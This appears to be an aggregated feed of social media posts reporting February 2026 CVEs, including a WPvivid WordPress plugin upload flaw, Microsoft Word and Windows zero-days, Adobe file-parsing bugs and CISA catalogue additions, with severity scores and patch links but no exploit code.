A critical arbitrary file upload vulnerability (CVE-2026-1357, CVSS 9.8) was discovered in the WPvivid Backup & Migration plugin, which is installed on over 800,000 WordPress sites.

The flaw allows unauthenticated attackers to upload arbitrary files, potentially achieving remote code execution and full site takeover.

Update to version 0.9.124. Wordfence Premium users received firewall protection on January 22.

wordfence.com/blog/2026/02/800

#WordPress #WebSecurity #Wordfence

##

CVE-2026-21531
(9.8 CRITICAL)

EPSS: 0.16%

updated 2026-02-10T21:51:48.077000

3 posts

Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.

offseq at 2026-02-11T03:00:29.734Z ##

🚨 CVE-2026-21531: Critical RCE in Azure AI Language Authoring SDK v1.0.0 via deserialization of untrusted data. Unauthenticated attackers can execute code remotely. Restrict access & monitor endpoints until patched. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T23:25:59.000Z ##

🔴 CVE-2026-21531 - Critical (9.8)

Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:25:59.000Z ##

🔴 CVE-2026-21531 - Critical (9.8)

Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21246
(7.8 HIGH)

EPSS: 0.02%

updated 2026-02-10T21:51:48.077000

2 posts

Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.

thehackerwire@mastodon.social at 2026-02-11T01:25:25.000Z ##

🟠 CVE-2026-21246 - High (7.8)

Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:25:25.000Z ##

🟠 CVE-2026-21246 - High (7.8)

Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21257
(8.0 HIGH)

EPSS: 0.05%

updated 2026-02-10T21:51:48.077000

2 posts

Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.

thehackerwire@mastodon.social at 2026-02-11T01:21:02.000Z ##

🟠 CVE-2026-21257 - High (8)

Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:21:02.000Z ##

🟠 CVE-2026-21257 - High (8)

Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21537
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-10T21:51:48.077000

2 posts

Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.

thehackerwire@mastodon.social at 2026-02-10T23:28:16.000Z ##

🟠 CVE-2026-21537 - High (8.8)

Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:28:16.000Z ##

🟠 CVE-2026-21537 - High (8.8)

Improper control of generation of code ('code injection') in Microsoft Defender for Linux allows an unauthorized attacker to execute code over an adjacent network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25992
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T21:51:48.077000

2 posts

SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass restrictions using mixed-case paths and read protected configuration files. This vulnerability is fixed in 3.5.5.

thehackerwire@mastodon.social at 2026-02-10T23:15:24.000Z ##

🟠 CVE-2026-25992 - High (7.5)

SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:15:24.000Z ##

🟠 CVE-2026-25992 - High (7.5)

SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21352
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:51:48.077000

2 posts

DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:55:18.000Z ##

🟠 CVE-2026-21352 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:55:18.000Z ##

🟠 CVE-2026-21352 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1603
(8.6 HIGH)

EPSS: 0.15%

updated 2026-02-10T21:51:48.077000

2 posts

An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allows a remote unauthenticated attacker to leak specific stored credential data.

AAKL at 2026-02-10T16:58:56.429Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur

##

AAKL@infosec.exchange at 2026-02-10T16:58:56.000Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur #Ivanti #infosec #vulnerability

##

CVE-2026-21344
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:31:42

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:55:39.000Z ##

🟠 CVE-2026-21344 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:55:39.000Z ##

🟠 CVE-2026-21344 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1507
(7.5 HIGH)

EPSS: 0.05%

updated 2026-02-10T21:31:42

2 posts

The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.

thehackerwire@mastodon.social at 2026-02-10T21:42:04.000Z ##

🟠 CVE-2026-1507 - High (7.5)

The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:42:04.000Z ##

🟠 CVE-2026-1507 - High (7.5)

The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21349
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:31:42

2 posts

Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:00:50.000Z ##

🟠 CVE-2026-21349 - High (7.8)

Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:00:50.000Z ##

🟠 CVE-2026-21349 - High (7.8)

Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21347
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:31:41

2 posts

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T22:16:23.000Z ##

🟠 CVE-2026-21347 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T22:16:23.000Z ##

🟠 CVE-2026-21347 - High (7.8)

Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21345
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:31:41

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T22:16:04.000Z ##

🟠 CVE-2026-21345 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T22:16:04.000Z ##

🟠 CVE-2026-21345 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21353
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:31:41

2 posts

DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T21:55:28.000Z ##

🟠 CVE-2026-21353 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:55:28.000Z ##

🟠 CVE-2026-21353 - High (7.8)

DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21341
(7.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T21:31:37

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T23:02:48.000Z ##

🟠 CVE-2026-21341 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:02:48.000Z ##

🟠 CVE-2026-21341 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21342
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T21:31:37

2 posts

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T23:02:27.000Z ##

🟠 CVE-2026-21342 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:02:27.000Z ##

🟠 CVE-2026-21342 - High (7.8)

Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1848
(7.5 HIGH)

EPSS: 0.04%

updated 2026-02-10T21:31:36

2 posts

Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, pending the proxy protocol header.

thehackerwire@mastodon.social at 2026-02-10T23:15:05.000Z ##

🟠 CVE-2026-1848 - High (7.5)

Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:15:05.000Z ##

🟠 CVE-2026-1848 - High (7.5)

Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21514
(7.8 HIGH)

EPSS: 6.65%

updated 2026-02-10T21:31:29

12 posts

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

guardingpearsoftware@mastodon.social at 2026-02-11T13:35:58.000Z ##

A critical zero-day vulnerability in Microsoft Word, identified as CVE-2026-21514, has been disclosed. The flaw is being actively exploited in the wild.
cybersecuritynews.com/microsof

##

thehackerwire@mastodon.social at 2026-02-10T23:39:11.000Z ##

🟠 CVE-2026-21514 - High (7.8)

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21514
CVE-2026-21514

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21519 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21525 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21533 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

##

AAKL at 2026-02-10T21:44:38.176Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:40.000Z ##

CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer at 2026-02-10T18:52:59.664Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

thehackerwire@mastodon.social at 2026-02-10T23:39:11.000Z ##

🟠 CVE-2026-21514 - High (7.8)

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

0x3e4@cyberplace.social at 2026-02-10T22:45:42.000Z ##

🔐 CVE-2026-21514
CVE-2026-21514

Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.

📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

AAKL@infosec.exchange at 2026-02-10T21:44:38.000Z ##

CISA has updated the KEV catalogue, and Microsoft is the winner.

- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability cve.org/CVERecord?id=CVE-2026-

CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability cve.org/CVERecord?id=CVE-2026-

More:

CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication cisa.gov/news-events/news/cisa

The guide: cisa.gov/resources-tools/resou

Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps cisa.gov/news-events/alerts/20 #CISA #infosec #Microsoft #vulnerability

##

cisakevtracker@mastodon.social at 2026-02-10T19:02:40.000Z ##

CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

DarkWebInformer@infosec.exchange at 2026-02-10T18:52:59.000Z ##

‼️ CISA has added 6 vulnerabilities to the KEV Catalog

CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.

CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.

##

CVE-2026-21525
(6.2 MEDIUM)

EPSS: 8.55%

updated 2026-02-10T21:31:29

10 posts

Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.

undercodenews@mastodon.social at 2026-02-11T10:57:01.000Z ##

Critical Windows RasMan Zero-Day Exploited: February 2026 Patch Released

Microsoft has urgently released security updates on February 10, 2026, to fix a critical zero-day vulnerability in the Windows Remote Access Connection Manager (RasMan) service. This flaw, tracked as CVE-2026-21525, is actively exploited in the wild, enabling attackers to crash systems and disrupt remote connections—a serious concern for organizations relying on VPNs, remote desktops, and other…

undercodenews.com/critical-win

##

0x3e4@cyberplace.social at 2026-02-10T22:45:41.000Z ##

🔐 CVE-2026-21525
CVE-2026-21525

Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.

📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: msrc.microsoft.com/update-guid cisa.gov/known-exploited-vulne

##

secdb at 2026-02-10T22:00:15.348Z ##

🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2026-21510 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: msrc.microsoft.com/update-guid ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21513 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: portal.msrc.microsoft.com/en-U ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-21514 (secdb.nttzen.cloud/cve/detail/)
